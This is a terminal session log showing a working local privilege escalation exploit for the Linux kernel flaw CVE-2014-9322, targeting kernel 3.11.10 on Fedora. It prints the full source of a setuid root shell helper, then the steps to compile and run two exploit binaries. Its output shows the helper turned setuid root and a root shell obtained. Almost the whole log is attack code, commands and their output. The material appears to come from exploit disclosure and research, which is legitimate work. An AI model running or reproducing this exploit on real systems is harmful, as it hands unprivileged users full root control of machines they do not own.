CVE-2014-9322
Vulnerability reference:
The exp is from @pi3
before 3.17.5
[pi3@localhost clean_9322]$ cat z_shell.c
#include <stdio.h>
int main(void) {
char *p_arg[] = { "/bin/sh", NULL };
setuid(0);
seteuid(0);
setgid(0);
setegid(0);
execv("/bin/sh",p_arg,NULL);
}
[pi3@localhost clean_9322]$ gcc z_shell.c -o z_shell
[pi3@localhost clean_9322]$ cp z_shell /tmp/pi3
[pi3@localhost clean_9322]$ ls -al /tmp/pi3
-rwxrwxr-x 1 pi3 pi3 8764 April 6 23:09 /tmp/pi3
[pi3@localhost clean_9322]$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
[pi3@localhost clean_9322]$ /tmp/pi3
sh-4.2$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
sh-4.2$ exit
exit
[pi3@localhost clean_9322]$ gcc -o procrop procrop.c setss.S
[pi3@localhost clean_9322]$ gcc -o p_write8 swapgs.c setss.S -lpthread
swapgs.c: In function ‘main’:
swapgs.c:175:29: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
: "r"(4), "r"((int)p_to_d), "r"(1)
^
[pi3@localhost clean_9322]$ ./procrop
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
Usage: ./procrop <number>
Number:
1 - kernel [3.11.10-301.fc20.x86_64]
[pi3@localhost clean_9322]$ ./procrop 1 &
[1] 5827
[pi3@localhost clean_9322]$
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
[+] Using kernel target: 3.11.10-301.fc20.x86_64
[pi3@localhost clean_9322]$
[pi3@localhost clean_9322]$
[pi3@localhost clean_9322]$ ps aux |grep procr
pi3 5827 83.0 0.0 4304 320 pts/1 RL 23:12 0:05 ./procrop 1
pi3 5829 0.0 0.1 112660 916 pts/1 S+ 23:12 0:00 grep --color=auto procr
[pi3@localhost clean_9322]$ ./p_write8
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
Usage: ./p_write8 <number>
Number:
1 - kernel [3.11.10-301.fc20.x86_64]
[pi3@localhost clean_9322]$
[pi3@localhost clean_9322]$ ./p_write8 1
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
[+] Using kernel target: 3.11.10-301.fc20.x86_64
[+] mmap() memory in first 2GB of address space... DONE!
[+] Preparing kernel structures... DONE! (ovbuf at 0x602140)
[+] Creating LDT for this process... DONE!
[+] Press enter to start fun-game...
[exploit] pthread runningAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[1]+ Done ./procrop 1
Segmentation fault (core dumped)
[pi3@localhost clean_9322]$ ls -al /tmp/pi3
-rwsrwsrwx 1 root root 8764 April 6 23:09 /tmp/pi3
[pi3@localhost clean_9322]$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
[pi3@localhost clean_9322]$ /tmp/pi3
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),1000(pi3)
sh-4.2# exit
exit
[pi3@localhost clean_9322]$